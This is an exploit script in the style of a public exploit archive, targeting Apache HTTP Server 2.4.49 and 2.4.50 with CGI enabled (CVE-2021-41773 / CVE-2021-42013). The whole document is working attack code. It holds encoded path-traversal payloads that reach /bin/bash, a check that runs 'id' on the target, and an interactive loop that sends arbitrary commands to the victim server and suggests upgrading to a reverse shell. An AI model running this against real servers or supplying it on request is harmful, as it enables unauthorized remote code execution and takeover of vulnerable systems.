# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) # Date: 11/11/2021 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://apache.org/ # Software Link: https://github.com/Balgogan/CVE-2021-41773 # Version: Apache 2.4.49/2.4.50 (CGI enabled) # Tested on: Debian GNU/Linux # CVE : CVE-2021-41773 / CVE-2021-42013 # Credits : Lucas Schnell #!/usr/bin/env python3 #coding: utf-8 import os import re import sys import time import requests from colorama import Fore,Style header = '''\033[1;91m ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ ''' + Style.RESET_ALL if len(sys.argv) < 2 : print( 'Use: python3 file.py ip:port ' ) sys.exit() def end(): print("\t\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) def commands(url,command,session): directory = mute_command(url,'pwd') user = mute_command(url,'whoami') hostname = mute_command(url,'hostname') advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)') command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") command = f"echo; {command};" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text print(output) if 'clear' in command: os.system('/usr/bin/clear') print(header) if 'exit' in command: end() def mute_command(url,command): session = requests.Session() req = requests.Request('POST', url=url, data=f"echo; {command}") prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) return response.text.strip() def exploitRCE(payload): s = requests.Session() try: host = sys.argv[1] if 'http' not in host: url = 'http://'+ host + payload else: url = host + payload session = requests.Session() command = "echo; id" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text if "uid" in output: choice = "Y" print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host) print("[!] Sortie:\n\n" + Fore.YELLOW + output ) choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ") if choice.lower() in ['','y','yes']: while True: commands(url,command,session) else: end() else : print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host) except KeyboardInterrupt: end() def main(): try: apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' payloads = [apache2449_payload,apache2450_payload] choice = len(payloads) + 1 print(header) print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE") while choice >= len(payloads) and choice >= 0: choice = int(input('[~] Choice : ')) if choice < len(payloads): exploitRCE(payloads[choice]) except KeyboardInterrupt: print("\n\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) if __name__ == '__main__': main()